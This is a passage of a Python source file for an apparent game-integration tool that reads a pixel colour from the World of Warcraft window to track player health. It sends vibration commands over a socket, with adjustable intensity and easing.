elif t == "click":
c.cursor["x"] = data[0]
c.cursor["y"] = data[1]
c.saveConfig()
self.ui.setCursorCoordinates(self.conf.cursor["x"], self.conf.cursor["y"])
elif t == "intensity":
c.maxIntensity = data[0]
c.minIntensity = min(c.maxIntensity, c.minIntensity)
self.ui.setMinIntensity(c.minIntensity)
self.scheduleSave()
elif t == "minintensity":
c.minIntensity = data[0]
c.maxIntensity = max(c.maxIntensity, c.minIntensity)
self.ui.setIntensity(c.maxIntensity)
self.scheduleSave()
elif t == "ratio":
c.hpRatio = data[0]
self.scheduleSave()
elif t == "weakaura":
self.conf.copyWeakaura()
def onWowRunning(self, running):
self.ui.setWowRunning(running)
if not running:
self.sock.resetVib()
def onConnection(self, connected):
self.ui.setConnectionStatus(connected)
def scheduleSave(self):
self.saveScheduled = time.time()+0.2
def startTween(self, amount):
# Power at start of tween
self.tweenStart = self.tweenVal+amount
# Time at start of tween
self.tweenStarted = time.time()
# Power at tween start needs to be at least 15%
# Duration should be total intensity plus 0.2, but max 4
self.tweenDuration = min(0.2+self.tweenStart*2, 4)
# Intensity slides between min and max
intensity = min(max(
self.tweenStart*
(self.conf.maxIntensity-self.conf.minIntensity)+
self.conf.minIntensity, 0), self.conf.maxIntensity)
#print(amount, intensity, self.tweenDuration)
self.sock.sendProgram(intensity, self.tweenDuration)
# Sigint handling
def sigint_handler(self, signal, frame):
print ('Interrupted')
os._exit(1)
# Threading
    @staticmethod
    def createThread(func, autostart=True):
thrd = threading.Thread(target=func)
thrd.daemon = True
if autostart:
thrd.start()
return thrd
def loop(self):
while True:
t = time.time()
passed = t-self.tickTime
self.tickTime = t
conf = self.conf
conf.processScan() # See if WoW is running or not
if self.saveScheduled:
self.saveScheduled = 0
self.conf.saveConfig()
if self.sock.connected and self.conf.wowPid:
color = conf.updatePixelColor()
if conf.g == 51:
index = 0
hpp = conf.r/255
if hpp < self.cacheHP:
self.startTween((self.cacheHP-hpp)*self.conf.hpRatio)
self.cacheHP = hpp
if self.tweenStarted:
                tweenPerc = 1 - (t - self.tweenStarted) / self.tweenDuration
if tweenPerc < 0:
tweenPerc = 0
self.tweenStarted = 0
elif tweenPerc > 1:
tweenPerc = 1
self.tweenVal = pytweening.linear(tweenPerc)*self.tweenStart
if not self.conf.wowPid:
time.sleep(1)
else:
after = time.time()
logicTime = 1/self.FRAMERATE-(after-t)
if logicTime > 0:
time.sleep(logicTime)
#Begin
App()
|